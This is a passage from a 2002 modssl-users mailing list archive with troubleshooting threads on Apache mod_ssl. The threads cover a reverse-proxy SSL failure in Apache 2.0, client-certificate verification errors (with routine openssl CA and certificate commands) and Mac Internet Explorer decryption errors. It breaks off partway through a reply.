(MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id WAA16178; Tue, 26 Mar 2002 22:50:37 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 948AB4CE75B; Tue, 26 Mar 2002 22:50:36 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g2QJs0G53100; Tue, 26 Mar 2002 20:54:00 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail1.servstream.com id TAA00873; Tue, 26 Mar 2002 19:49:25 +0100 (MET) Received: from xev.servstream.com ([193.41.1.65]) by mail1.servstream.com (8.11.6/8.11.6) with SMTP id g2QInNU28053 for ; Tue, 26 Mar 2002 18:49:23 GMT Date: Tue, 26 Mar 2002 18:31:16 +0000 From: Patrick Herborn To: modssl-users@modssl.org Subject: Odd interaction between mod_ssl, mod_rewrite and mod_proxy Message-Id: <20020326183116.1d9ef0cb.pat@nanobyte.demon.co.uk> Organization: Nanobyte Systems Limited X-Mailer: Sylpheed version 0.7.4 (GTK+ 1.2.10; i686-pc-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Patrick Herborn X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I have been trying to configure the following setup: PRIVATE LAN | INTERNET | back_end <--HTTP--> Apache <--HTTPS--> Client | | Ie the Apache box is acting as a bastion host between the Internet and a private LAN segment. I have a valid cert and key on the Apache box, and SSL negotiation works fine. I also have the whole thing working with pure HTTP (no SSL) but with both, ie running SSL to the Apache box, then plain HTTP to the back end, it breaks. This is with Apache 2.0.32 (so the API is somewhat different), but here's a brief trace from the SSL engine log.... [26/Mar/2002 16:38:34 19733] [info] Connection to child 4 established (server www.test.com:443, client 1.2.3.4) [26/Mar/2002 16:38:34 19733] [info] Seeding PRNG with 136 bytes of entropy [26/Mar/2002 16:38:34 19733] [info] Connection: Client IP: 1.2.3.4, Protocol: TLSv1, Cipher: RC4-MD5 (128/128 bits) [26/Mar/2002 16:38:34 19733] [info] Connection to child 4 established (server www.test.com:443, client 10.46.101.101) [26/Mar/2002 16:38:34 19733] [info] Seeding PRNG with 136 bytes of entropy [26/Mar/2002 16:38:34 19733] [error] SSL error on writing data (OpenSSL library error follows) [26/Mar/2002 16:38:34 19733] [error] OpenSSL: error:140D0114:SSL routines:SSL_write:uninitialized [26/Mar/2002 16:38:34 19733] [error] failed to write 16 of 16 bytes (reason unknown) Client IP address has been changed, as has the site name... OK, so everything is going really well up to line 4. 10.46.101.101 is the back end server, but it would appear that the SSL engine thinks that the back end server has connected to it as a client (odd...). It then all goes pear shaped. >From what I can remember, this type of setup should work, and I seem to recall getting it to work before (with Apache 1.3.x ?). Has anyone else had any success at getting this type of bastion host to work with Apache 2.0.32 (and the mod_ssl supplied with that) ? Is it supposed to work at all? Is this a bug, feature, or just my poor configuration skills? >From what I can tell from the source code, it would appear that mod_ssl calls ap_hook_pre_connection to register the function which builds the SSL session, my gut feeling is that this is being inherited by mod_proxy, and as mod_proxy tries to send the HTTP/1.1 request to the back end, mod_ssl is trying to negotiate an SSL with a client (which does not exist). But I may well be barking up the wrong tree. Any help / advice / known good configs most appreciated. Regards, Patrick Herborn. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Mar 26 22:52:16 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id WAA16234; Tue, 26 Mar 2002 22:51:36 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id WAA16177; Tue, 26 Mar 2002 22:50:37 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 82A904CE731; Tue, 26 Mar 2002 22:50:36 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g2QJrvi53094; Tue, 26 Mar 2002 20:53:57 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail.ipfw.org id TAA27035; Tue, 26 Mar 2002 19:07:28 +0100 (MET) Received: from apollo (apollo.objtech.com [192.168.111.5]) by mail.ipfw.org (Postfix) with ESMTP id 243AC310C for ; Tue, 26 Mar 2002 13:07:22 -0500 (EST) Date: Tue, 26 Mar 2002 13:07:22 -0500 From: Peter Chiu X-Mailer: The Bat! (v1.60) X-Priority: 3 (Normal) Message-ID: <7644148732.20020326130722@ipfw.org> To: modssl-users@modssl.org Subject: Certificate Verification: Error (20): unable to get local issuer certificate (LONG) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Peter Chiu X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Sorry to everybody, this is a long post. I am having trouble getting client auth going (been trying it for 8hrs). I am running fbsd4.5-release, apache 1.3.23 and mod_ssl 2.8.7. Error Log ========= [26/Mar/2002 12:45:19 14664] [info] Connection to child 5 established (server w ebmail.ipfw.org:443, client 192.168.111.254) [26/Mar/2002 12:45:19 14664] [info] Seeding PRNG with 23177 bytes of entropy [26/Mar/2002 12:45:19 14664] [error] Certificate Verification: Error (20): unabl e to get local issuer certificate I enclosed the steps that I did to create CA, Server and client cert and my httpd.conf. Pls take you time and read it. Any help will be greatly appreciated. TIA. Create CA ========= zeus:incoming# openssl genrsa -des3 -out ca.key 1024 warning, not much extra random data, consider using the -rand option Generating RSA private key, 1024 bit long modulus ......................................++++++ .++++++ e is 65537 (0x10001) Enter PEM pass phrase: Verifying password - Enter PEM pass phrase: zeus:incoming# openssl req -new -x509 -days 365 -key ca.key -out ca.crt Using configuration from /etc/ssl/openssl.cnf Enter PEM pass phrase: You are about to be asked to enter information that will be incorporated into your certificate request. What you are about to enter is what is called a Distinguished Name or a DN. There are quite a few fields but you can leave some blank For some fields there will be a default value, If you enter '.', the field will be left blank. ----- Country Name (2 letter code) [AU]:CA State or Province Name (full name) [Some-State]:Ontario Locality Name (eg, city) []:Mississauga Organization Name (eg, company) [Internet Widgits Pty Ltd]:ipfw CA Organizational Unit Name (eg, section) []:Certificate Authorize^C zeus:incoming# openssl req -new -x509 -days 365 -key ca.key -out ca.crt Using configuration from /etc/ssl/openssl.cnf Enter PEM pass phrase: You are about to be asked to enter information that will be incorporated into your certificate request. What you are about to enter is what is called a Distinguished Name or a DN. There are quite a few fields but you can leave some blank For some fields there will be a default value, If you enter '.', the field will be left blank. ----- Country Name (2 letter code) [AU]:CA State or Province Name (full name) [Some-State]:Ontario Locality Name (eg, city) []:Mississauga Organization Name (eg, company) [Internet Widgits Pty Ltd]:ipfw.org Organizational Unit Name (eg, section) []:Certificate Authority Common Name (eg, YOUR name) []:webmail.ipfw.org Email Address []:ca@ipfw.org zeus:incoming# ll total 19 drwxr-xr-x 2 webbie webbie 512 Mar 26 12:21 . drwx------ 9 webbie webbie 1024 Mar 26 00:57 .. -rw-r--r-- 1 root webbie 1346 Mar 26 12:21 ca.crt -rw-r--r-- 1 root webbie 963 Mar 26 12:19 ca.key -rwxr-xr-x 1 webbie webbie 1784 Mar 26 03:11 sign.sh CA creation done, now make the server key. =========================================== zeus:incoming# openssl genrsa -des3 -out server.key 1024 warning, not much extra random data, consider using the -rand option Generating RSA private key, 1024 bit long modulus ......++++++ ........................................++++++ e is 65537 (0x10001) Enter PEM pass phrase: Verifying password - Enter PEM pass phrase: zeus:incoming# openssl req -new -key server.key -out server.csr Using configuration from /etc/ssl/openssl.cnf Enter PEM pass phrase: You are about to be asked to enter information that will be incorporated into your certificate request. What you are about to enter is what is called a Distinguished Name or a DN. There are quite a few fields but you can leave some blank For some fields there will be a default value, If you enter '.', the field will be left blank. ----- Country Name (2 letter code) [AU]:CA State or Province Name (full name) [Some-State]:Ontario Locality Name (eg, city) []:Mississauga Organization Name (eg, company) [Internet Widgits Pty Ltd]:ipfw.org Organizational Unit Name (eg, section) []:WebServer Team Common Name (eg, YOUR name) []:webmail.ipfw.org Email Address []:ca@ipfw.org Please enter the following 'extra' attributes to be sent with your certificate request A challenge password []: An optional company name []: zeus:incoming# ll -rt total 21 drwx------ 9 webbie webbie 1024 Mar 26 00:57 .. -rwxr-xr-x 1 webbie webbie 1784 Mar 26 03:11 sign.sh -rw-r--r-- 1 root webbie 963 Mar 26 12:19 ca.key -rw-r--r-- 1 root webbie 1346 Mar 26 12:21 ca.crt -rw-r--r-- 1 root webbie 963 Mar 26 12:22 server.key -rw-r--r-- 1 root webbie 716 Mar 26 12:23 server.csr drwxr-xr-x 2 webbie webbie 512 Mar 26 12:23 . Now, I am going to sign my server cert using my own CA ====================================================== zeus:incoming# ./sign.sh server.csr CA signing: server.csr -> server.crt: Using configuration from ca.config Enter PEM pass phrase: Check that the request matches the signature Signature ok The Subjects Distinguished Name is as follows countryName :PRINTABLE:'CA' stateOrProvinceName :PRINTABLE:'Ontario' localityName :PRINTABLE:'Mississauga' organizationName :PRINTABLE:'ipfw.org' organizationalUnitName:PRINTABLE:'WebServer Team' commonName :PRINTABLE:'webmail.ipfw.org' emailAddress :IA5STRING:'ca@ipfw.org' Certificate is to be certified until Mar 26 17:25:23 2003 GMT (365 days) Sign the certificate? [y/n]:y 1 out of 1 certificate requests certified, commit? [y/n]y Write out database with 1 new entries Data Base Updated CA verifying: server.crt <-> CA cert server.crt: OK zeus:incoming# ll total 27 drwxr-xr-x 3 webbie webbie 512 Mar 26 12:25 . drwx------ 9 webbie webbie 1024 Mar 26 00:57 .. -rw-r--r-- 1 root webbie 1346 Mar 26 12:21 ca.crt drwxr-xr-x 2 root webbie 512 Mar 26 12:25 ca.db.certs -rw-r--r-- 1 root webbie 126 Mar 26 12:25 ca.db.index -rw-r--r-- 1 root webbie 3 Mar 26 12:25 ca.db.serial -rw-r--r-- 1 root webbie 963 Mar 26 12:19 ca.key -rw-r--r-- 1 root webbie 2745 Mar 26 12:25 server.crt -rw-r--r-- 1 root webbie 716 Mar 26 12:23 server.csr -rw-r--r-- 1 root webbie 963 Mar 26 12:22 server.key -rwxr-xr-x 1 webbie webbie 1785 Mar 26 12:24 sign.sh Now, I am going to create my client cert and sign with my own CA ================================================================ zeus:incoming# openssl genrsa -des3 -out kingkong.key 1024 warning, not much extra random data, consider using the -rand option Generating RSA private key, 1024 bit long modulus .......++++++ .................++++++ e is 65537 (0x10001) Enter PEM pass phrase: Verifying password - Enter PEM pass phrase: zeus:incoming# openssl req -new -key kingkong.key -out kingkong.csr Using configuration from /etc/ssl/openssl.cnf Enter PEM pass phrase: You are about to be asked to enter information that will be incorporated into your certificate request. What you are about to enter is what is called a Distinguished Name or a DN. There are quite a few fields but you can leave some blank For some fields there will be a default value, If you enter '.', the field will be left blank. ----- Country Name (2 letter code) [AU]:CA State or Province Name (full name) [Some-State]:Ontario Locality Name (eg, city) []:Mississauga Organization Name (eg, company) [Internet Widgits Pty Ltd]:ipfw.org Organizational Unit Name (eg, section) []:kingkong Common Name (eg, YOUR name) []:kingkong Email Address []: Please enter the following 'extra' attributes to be sent with your certificate request A challenge password []: An optional company name []: zeus:incoming# ./sign.sh kingkong.csr CA signing: kingkong.csr -> kingkong.crt: Using configuration from ca.config Enter PEM pass phrase: Check that the request matches the signature Signature ok The Subjects Distinguished Name is as follows countryName :PRINTABLE:'CA' stateOrProvinceName :PRINTABLE:'Ontario' localityName :PRINTABLE:'Mississauga' organizationName :PRINTABLE:'ipfw.org' organizationalUnitName:PRINTABLE:'kingkong' commonName :PRINTABLE:'kingkong' Certificate is to be certified until Mar 26 17:37:13 2003 GMT (365 days) Sign the certificate? [y/n]:y 1 out of 1 certificate requests certified, commit? [y/n]y Write out database with 1 new entries Data Base Updated CA verifying: kingkong.crt <-> CA cert kingkong.crt: OK zeus:incoming# ll total 32 drwxr-xr-x 3 webbie webbie 512 Mar 26 12:37 . drwx------ 9 webbie webbie 1024 Mar 26 00:57 .. -rw-r--r-- 1 root webbie 1346 Mar 26 12:21 ca.crt drwxr-xr-x 2 root webbie 512 Mar 26 12:37 ca.db.certs -rw-r--r-- 1 root webbie 220 Mar 26 12:37 ca.db.index -rw-r--r-- 1 root webbie 3 Mar 26 12:37 ca.db.serial -rw-r--r-- 1 root webbie 963 Mar 26 12:19 ca.key -rw-r--r-- 1 root webbie 2656 Mar 26 12:37 kingkong.crt -rw-r--r-- 1 root webbie 660 Mar 26 12:36 kingkong.csr -rw-r--r-- 1 root webbie 963 Mar 26 12:34 kingkong.key -rw-r--r-- 1 root webbie 2745 Mar 26 12:25 server.crt -rw-r--r-- 1 root webbie 716 Mar 26 12:23 server.csr -rw-r--r-- 1 root webbie 963 Mar 26 12:22 server.key -rwxr-xr-x 1 webbie webbie 1785 Mar 26 12:24 sign.sh Export the key to IE5 ====================== zeus:incoming# openssl pkcs12 -export -in kingkong.crt -inkey kingkong.key -certfile ca.crt -name "webmail.ipfw.org" -out kingkong.p12 Enter PEM pass phrase: Enter Export Password: Verifying password - Enter Export Password: zeus:incoming# ll total 35 drwxr-xr-x 3 webbie webbie 512 Mar 26 12:38 . drwx------ 9 webbie webbie 1024 Mar 26 00:57 .. -rw-r--r-- 1 root webbie 1346 Mar 26 12:21 ca.crt drwxr-xr-x 2 root webbie 512 Mar 26 12:37 ca.db.certs -rw-r--r-- 1 root webbie 220 Mar 26 12:37 ca.db.index -rw-r--r-- 1 root webbie 3 Mar 26 12:37 ca.db.serial -rw-r--r-- 1 root webbie 963 Mar 26 12:19 ca.key -rw-r--r-- 1 root webbie 2656 Mar 26 12:37 kingkong.crt -rw-r--r-- 1 root webbie 660 Mar 26 12:36 kingkong.csr -rw-r--r-- 1 root webbie 963 Mar 26 12:34 kingkong.key -rw-r--r-- 1 root webbie 2758 Mar 26 12:38 kingkong.p12 -rw-r--r-- 1 root webbie 2745 Mar 26 12:25 server.crt -rw-r--r-- 1 root webbie 716 Mar 26 12:23 server.csr -rw-r--r-- 1 root webbie 963 Mar 26 12:22 server.key -rwxr-xr-x 1 webbie webbie 1785 Mar 26 12:24 sign.sh httpd.conf ========== [snip] ServerAdmin webmaster@ipfw.org DocumentRoot /opt/webmail.ipfw.org ServerName webmail.ipfw.org ErrorLog logs/webmail-error_log SSLEngine on SSLProtocol all SSLCipherSuite HIGH:MEDIUM SSLCertificateFile /opt/apache/conf/ssl.crt/server.crt SSLCertificateKeyFile /opt/apache/conf/ssl.key/server.key SSLCertificateChainFile /opt/apache/conf/ssl.crt/ca.crt SSLCACertificatePath /opt/apache/conf/ssl.crt SSLVerifyClient require SSLVerifyDepth 1 SSLOptions +StdEnvVars SSLOptions +StdEnvVars SetEnvIf User-Agent ".*MSIE.*" \ nokeepalive ssl-unclean-shutdown \ downgrade-1.0 force-response-1.0 CustomLog /opt/apache/logs/ssl_request_log \ "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b" -- Peter \\|// (o o) +-------------------------oOOo-(_)-oOOo-----------------------------+ EMail : mailto:pccb(at)ipfw(dot)org PGP Key : http://www.ipfw.org/pgpkey.txt PGP Fingerprint: 1379 3D8A 024E 3C0E 1962 4E12 3742 0684 C29C 3537 +-------------------------------------------------------------------+ Its the InterNIC's fault. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Mar 26 23:52:24 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id XAA20857; Tue, 26 Mar 2002 23:51:21 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from wlv.to.gd-es.com id XAA20809; Tue, 26 Mar 2002 23:50:35 +0100 (MET) Received: from SPIELPLATZ.TO.GD-ES.COM (mcc@SPIELPLATZ.TO.GD-ES.COM [199.107.242.254]) by wlv.to.gd-es.com (8.11.6/8.10.1) with ESMTP id g2QMgb127133; Tue, 26 Mar 2002 14:42:37 -0800 (PST) Date: Tue, 26 Mar 2002 14:42:37 -0800 (PST) From: Merton Campbell Crockett X-Sender: mcc@SPIELPLATZ.TO.GD-ES.COM To: Patrick Herborn cc: modssl-users@modssl.org Subject: Re: Odd interaction between mod_ssl, mod_rewrite and mod_proxy In-Reply-To: <20020326183116.1d9ef0cb.pat@nanobyte.demon.co.uk> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Merton Campbell Crockett X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Tue, 26 Mar 2002, Patrick Herborn wrote: > I have been trying to configure the following setup: > > PRIVATE LAN | INTERNET > | > back_end <--HTTP--> Apache <--HTTPS--> Client > | > | > > Ie the Apache box is acting as a bastion host between the Internet and a > private LAN segment. I have a valid cert and key on the Apache box, and SSL > negotiation works fine. I also have the whole thing working with pure HTTP (no > SSL) but with both, ie running SSL to the Apache box, then plain HTTP to the > back end, it breaks. I assume that you have a virtual host defined on the Apache server with the same name as the back_end. Use mod_rewrite's [P] flag to generate the HTTP request to back_end. Use mod_proxy's ProxyPassReverse to capture the response from back_end and return it to the client. Re-read Ralph Engelshall's notes on mod_rewrite 3 or 4 times. It takes time for what my grandmother would have called "jookery-pookery" to sink in. When I developed a system running Stronghold several years ago, I recall running into problems with SSL (ssleay) until I realized that you needed to simulate ProxyPass using mod_rwrite. I don't think this is a mod_ssl problem. It's more of a problem of under which shell is the pea. Merton Campbell Crockett -- BEGIN: vcard VERSION: 3.0 FN: Merton Campbell Crockett ORG: General Dynamics Advanced Information Systems; Intelligence Solutions N: Crockett;Merton;Campbell EMAIL;TYPE=internet: mcc@CATO.GD-AIS.COM TEL;TYPE=work,voice,msg,pref: +1(805)497-5045 TEL;TYPE=pager,msg: +1(877)528-0049 TEL;TYPE=fax,work: +1(805)497-5050 TEL;TYPE=cell,voice,msg: +1(805)377-6762 END: vcard ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Mar 27 02:16:12 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id CAA02671; Wed, 27 Mar 2002 02:15:43 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from viefep12-int.chello.at id CAA02624; Wed, 27 Mar 2002 02:15:01 +0100 (MET) Received: from localhost ([212.17.119.87]) by viefep12-int.chello.at (InterMail vM.5.01.03.06 201-253-122-118-106-20010523) with ESMTP id <20020327011455.PTKM8446.viefep12-int.chello.at@localhost>; Wed, 27 Mar 2002 02:14:55 +0100 Date: Wed, 27 Mar 2002 02:16:20 +0100 From: Robert Allerstorfer X-Mailer: Why so curious? ;-) Organization: ANET - New Media Solutions X-Priority: 3 (Normal) Message-ID: <154136379212.20020327021620@anet.at> To: modssl-users@modssl.org Subject: No solution for bug with IE on Mac? MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Robert Allerstorfer X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, I have searched the archive and it seems that there is still no solution on how to make a https page viewable with MSIE on MacOS. It has been reported at http://www.mail-archive.com/modssl-users@modssl.org/msg13314.html a month ago and even back in 2000 at http://www.mail-archive.com/modssl-users@modssl.org/msg08560.html This annoying popup window stating "Security failure: Data decryption error" also comes with the latest Apache SSL environment (Apache/1.3.23 + mod_ssl/2.8.7 + OpenSSL/0.9.6c) on the latest Mac (OS 10.1) using the latest IE (5.1.3). You can see it yourself here: https://secure.anet.at/ Any help would be greatly appreciated. Kind regards, rob. -- Robert Allerstorfer ANET - New Media Solutions Allerstorfer & Beutel OEG A-1070 Wien, Apollogasse 9/7 Fon: (+43 1) 929133-1 Fax: (+43 1) 929133-2 http://www.anet.at info@anet.at PGP Public key: http://www.anet.at/info@anet.at_pub.asc ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Mar 27 09:06:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA14599; Wed, 27 Mar 2002 09:05:27 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id JAA14558; Wed, 27 Mar 2002 09:04:57 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1000) id 41A6C4CE618; Wed, 27 Mar 2002 09:04:57 +0100 (CET) Date: Wed, 27 Mar 2002 09:04:57 +0100 From: "Ralf S. Engelschall" To: modssl-users@modssl.org Subject: Re: mod_ssl for apache 1.3.24? Message-ID: <20020327080457.GA66856@engelschall.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.3.28i Organization: Engelschall, Germany. Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Ralf S. Engelschall" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users In article <5.1.0.14.0.20020325210916.00b9a510@mail.lusidor.nu> you wrote: > Just wanted to know if there's a mod_ssl version for apache 1.3.24? > Since the current version will not compile with apache 1.3.24. Will be released within the next 48 hours. Ralf S. Engelschall rse@engelschall.com www.engelschall.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Mar 27 12:03:15 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA25402; Wed, 27 Mar 2002 12:02:31 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail1.servstream.com id MAA25368; Wed, 27 Mar 2002 12:01:42 +0100 (MET) Received: from xev.servstream.com ([193.41.1.65]) by mail1.servstream.com (8.11.6/8.11.6) with SMTP id g2RB1aU30635 for ; Wed, 27 Mar 2002 11:01:37 GMT Date: Wed, 27 Mar 2002 10:43:15 +0000 From: Patrick Herborn To: modssl-users@modssl.org Subject: Re: Odd interaction between mod_ssl, mod_rewrite and mod_proxy Message-Id: <20020327104315.5e90cb57.pat@nanobyte.demon.co.uk> In-Reply-To: References: <20020326183116.1d9ef0cb.pat@nanobyte.demon.co.uk> Organization: Nanobyte Systems Limited X-Mailer: Sylpheed version 0.7.4 (GTK+ 1.2.10; i686-pc-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Patrick Herborn X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Tue, 26 Mar 2002 14:42:37 -0800 (PST) Merton Campbell Crockett wrote: > On Tue, 26 Mar 2002, Patrick Herborn wrote: > > > I have been trying to configure the following setup: > > > > PRIVATE LAN | INTERNET > > | > > back_end <--HTTP--> Apache <--HTTPS--> Client > > | > > | > > > > Ie the Apache box is acting as a bastion host between the Internet and a > > private LAN segment. I have a valid cert and key on the Apache box, and SSL > > negotiation works fine. I also have the whole thing working with pure HTTP > > (no SSL) but with both, ie running SSL to the Apache box, then plain HTTP > > to the back end, it breaks. > > I assume that you have a virtual host defined on the Apache server with > the same name as the back_end. Yes, that is correct, the only difference is that in the Apache box it is defined and a user would just connect to https://www.test.com/, without the port number because it is implicit. > Use mod_rewrite's [P] flag to generate the HTTP request to back_end. Yes, and that much appears to work. Indeed, running a tcpdump on the back end interface, I can actually see a SYN, SYN/ACK and ACK, ie the TCP layer is fine, mod_proxy is trying to connect (and does) with the back end, but as soon as it tries to send a GET to the back end, it breaks. > Use mod_proxy's ProxyPassReverse to capture the response from back_end and > return it to the client. Yep, got that. Like I said, it all works with plain old HTTP, but as soon as I try to run SSL it breaks. > Re-read Ralph Engelshall's notes on mod_rewrite 3 or 4 times. It takes > time for what my grandmother would have called "jookery-pookery" to sink > in. I'm not trying to do anything too complex with mod_rewrite, indeed I could use ProxyPass instead of [P] (but I will be doing URL filtering so I need the [F] target of mod_rewrite, something that ProxyPass wouldn't do) > When I developed a system running Stronghold several years ago, I recall > running into problems with SSL (ssleay) until I realized that you needed > to simulate ProxyPass using mod_rwrite. I have tested it with ProxyPass also, just to see if the problem lies with mod_rewrite, but I get exactly the same results. Today I will do a bit of testing with Apache 1.3.x to see if that works... > I don't think this is a mod_ssl problem. I'm not sure exactly where the problem lies, but thinking about it, if using ProxyPass yields the same results as RewriteRule, then it stands to reason that the problem doesn't lie with mod_rewrite, so that leaves mod_proxy and mod_ssl (and of course the Apache core). I'll keep digging.... > It's more of a problem of under which shell is the pea. Yeah... needle in haystack... up to now I've been content with configuring build options, building, and running Apache... now I need to sift through God knows how many lines of source code. Eeek. Regards, Patrick Herborn. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Mar 27 14:53:11 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA07209; Wed, 27 Mar 2002 14:52:25 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail1.servstream.com id OAA07027; Wed, 27 Mar 2002 14:51:09 +0100 (MET) Received: from xev.servstream.com ([193.41.1.65]) by mail1.servstream.com (8.11.6/8.11.6) with SMTP id g2RDp7U21657 for ; Wed, 27 Mar 2002 13:51:07 GMT Date: Wed, 27 Mar 2002 13:32:45 +0000 From: Patrick Herborn To: modssl-users@modssl.org Subject: Re: Odd interaction between mod_ssl, mod_rewrite and mod_proxy Message-Id: <20020327133245.103d82af.pat@nanobyte.demon.co.uk> In-Reply-To: References: <20020326183116.1d9ef0cb.pat@nanobyte.demon.co.uk> Organization: Nanobyte Systems Limited X-Mailer: Sylpheed version 0.7.4 (GTK+ 1.2.10; i686-pc-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Patrick Herborn X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Tue, 26 Mar 2002 14:42:37 -0800 (PST) Merton Campbell Crockett wrote: > On Tue, 26 Mar 2002, Patrick Herborn wrote: > > > I have been trying to configure the following setup: > > > > PRIVATE LAN | INTERNET > > | > > back_end <--HTTP--> Apache <--HTTPS--> Client > > | > > | > > > > Ie the Apache box is acting as a bastion host between the Internet and a > > private LAN segment. I have a valid cert and key on the Apache box, and SSL > > negotiation works fine. I also have the whole thing working with pure HTTP > > (no SSL) but with both, ie running SSL to the Apache box, then plain HTTP > > to the back end, it breaks. > > I assume that you have a virtual host defined on the Apache server with > the same name as the back_end. Use mod_rewrite's [P] flag to generate the > HTTP request to back_end. Use mod_proxy's ProxyPassReverse to capture the > response from back_end and return it to the client. Just a quick update. As previously stated it was setup as suggested and it worked fine with plain HTTP, but broke with HTTPS / SSL. I have now set this up with pretty much identical config but running Apache 1.3.x and it works just fine, it still does not work with Apache 2.0.32. My gut feeling at this stage, from the miniscule knowledge of the source I have gathered in the last day or so, is that it is an unwanted side-effect of the Apache 2.0 hook mechanism; it's as if the hook is being called even for a server-initiated TCP connection, not just for client initiated connections. Question is whose "responsibility" is it? Should mod_ssl skip the SSL negotiation on server-initiated connections (especially to port 80!), or should the Apache core bypass the hook on server-initiated connections? Ie is it a mod_ssl problem, or is it an Apache core problem? Or am I just barking up the wrong tree entirely? Patrick Herborn. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Mar 27 15:00:09 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA07850; Wed, 27 Mar 2002 14:59:15 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from LIILMTLSSM01.mailtask.com id OAA07755; Wed, 27 Mar 2002 14:58:13 +0100 (MET) Received: from [10.128.22.54] ([10.128.22.54]) by LIILMTLSSM01.mailtask.com with Microsoft SMTPSVC(5.0.2195.3779); Wed, 27 Mar 2002 07:57:56 -0600 User-Agent: Microsoft-Entourage/10.0.0.1331 Date: Wed, 27 Mar 2002 08:56:50 -0500 Subject: Re: No solution for bug with IE on Mac? From: John Siracusa To: Mod SSL , Robert Allerstorfer Message-ID: In-Reply-To: <154136379212.20020327021620@anet.at> Mime-version: 1.0 Content-type: text/plain; charset="US-ASCII" Content-transfer-encoding: 7bit X-OriginalArrivalTime: 27 Mar 2002 13:57:56.0500 (UTC) FILETIME=[65A25540:01C1D597] Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: John Siracusa X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On 3/26/02 8:16 PM, Robert Allerstorfer wrote: > I have searched the archive and it seems that there is still no > solution on how to make a https page viewable with MSIE on MacOS. Actually, I think there is (finally!) a solution. The following works for me (thanks to Mark J. Lilback). I thought I posted it here earlier, but if not, I'm sorry! :) --- Subject: Re: mod_ssl and Mac IE5 Date: Wednesday, February 6, 2002 2:33 PM From: Mark J. 